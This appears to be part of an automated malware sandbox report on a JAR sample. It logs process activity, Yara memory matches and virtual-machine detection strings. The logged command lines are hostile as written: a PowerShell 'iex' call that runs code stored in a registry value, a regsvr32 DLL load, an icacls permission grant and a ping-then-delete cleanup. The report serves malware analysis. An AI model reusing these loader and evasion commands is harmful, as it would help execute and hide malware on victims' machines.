Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar' |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline' |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline' |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3CF2.tmp' 'c:\Users\user\AppData\Local\Temp\wfvgme3v\CSCBEAB7CEF44BD41E5AC32CBB29DE9912D.TMP' |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES50C8.tmp' 'c:\Users\user\AppData\Local\Temp\wm2qs3oi\CSC4DF65D5B5CD44487ACE6B52D8E184D85.TMP' |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\winapp.dll' |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |
Source: C:\Windows\SysWOW64\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. |
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK |
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp |
Binary or memory string: ,java/lang/VirtualMachineError |
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp |
Binary or memory string: |[Ljava/lang/VirtualMachineError; |
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: org/omg/CORBA/OMGVMCID.classPK |
Source: regsvr32.exe, 00000006.00000003.900452153.0000000002EA8000.00000004.00000001.sdmp |
Binary or memory string: Hyper-V RAW |
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp |
Binary or memory string: java/lang/VirtualMachineError.classPK |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. |
Source: mshta.exe, 00000011.00000003.815205220.000002CF91D0F000.00000004.00000001.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: java.exe, 00000002.00000002.681160126.000000000078B000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp |
Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service. |
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |